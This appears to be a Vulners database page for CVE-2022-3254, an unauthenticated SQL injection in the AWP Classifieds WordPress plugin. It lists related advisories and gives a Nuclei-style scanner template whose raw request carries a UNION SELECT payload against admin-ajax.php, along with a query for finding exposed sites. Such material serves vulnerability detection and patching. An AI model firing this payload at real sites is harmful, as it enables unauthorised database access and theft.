| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2022-3254 | 31 Oct 202219:38 | – | circl | |
| WordPress plugin WordPress Classifieds Plugin SQL注入漏洞 | 31 Oct 202200:00 | – | cnnvd | |
| CVE-2022-3254 | 31 Oct 202200:00 | – | cve | |
| CVE-2022-3254 AWP Classifieds Plugin < 4.3 - Unauthenticated SQLi | 31 Oct 202200:00 | – | cvelist | |
| CVE-2022-3254 | 31 Oct 202216:15 | – | nvd | |
| CVE-2022-3254 | 31 Oct 202216:15 | – | osv | |
| WordPress AWP Classifieds plugin <= 4.2.1 - Unauthenticated SQL Injection (SQLi) vulnerability | 10 Oct 202200:00 | – | patchstack | |
| Sql injection | 31 Oct 202216:15 | – | prion | |
| PT-2022-21356 | 31 Oct 202200:00 | – | ptsecurity | |
| CVE-2022-3254 | 23 May 202501:19 | – | redhatcve |
id: CVE-2022-3254
info:
name: AWP Classifieds <= 4.2.1 - Unauthenticated SQL Injection
author: Shivam Kamboj
severity: critical
description: |
WordPress Classifieds Plugin before 4.3 contains a SQL injection caused by improper sanitization and escaping of parameters in an AJAX action, letting unauthenticated attackers execute arbitrary SQL commands, exploit requires the premium module to be active.
remediation: |
Update to version 4.3 or later.
impact: |
Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-3254
- https://wpscan.com/vulnerability/546c47c2-5b4b-46db-b754-c6b43aef2660
metadata:
verified: true
max-request: 2
publicwww-query: "plugins/another-wordpress-classifieds-plugin/"
tags: cve,cve2022,sqli,wordpress,wp-plugin,awpcp,unauth,wp,vkev
http:
- raw:
- |
GET /wp-admin/admin-ajax.php?action=awpcp-get-regions-options&context=search&parent_type=country&parent=test&type=id`+FROM+wp_users+WHERE+1=0+UNION+SELECT+VERSION();--+- HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'startswith(trim(body), "{")' # Ensure response is JSON structure
- 'contains_all(body, "options", "status")'
- '!contains(body, "\"options\":false")'
- '!regex(body, "\"options\"\\s*:\\s*\\[\\s*\\]")'
condition: and
# digest: 4a0a00473045022039b01f894e5ae7efd5f6585ba5fc791b47f973783458b2bacc15ff811049b57a022100d7522a9a5044adc9476aba52b88680f8f5e19ef31da77826020390ca250bc773:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation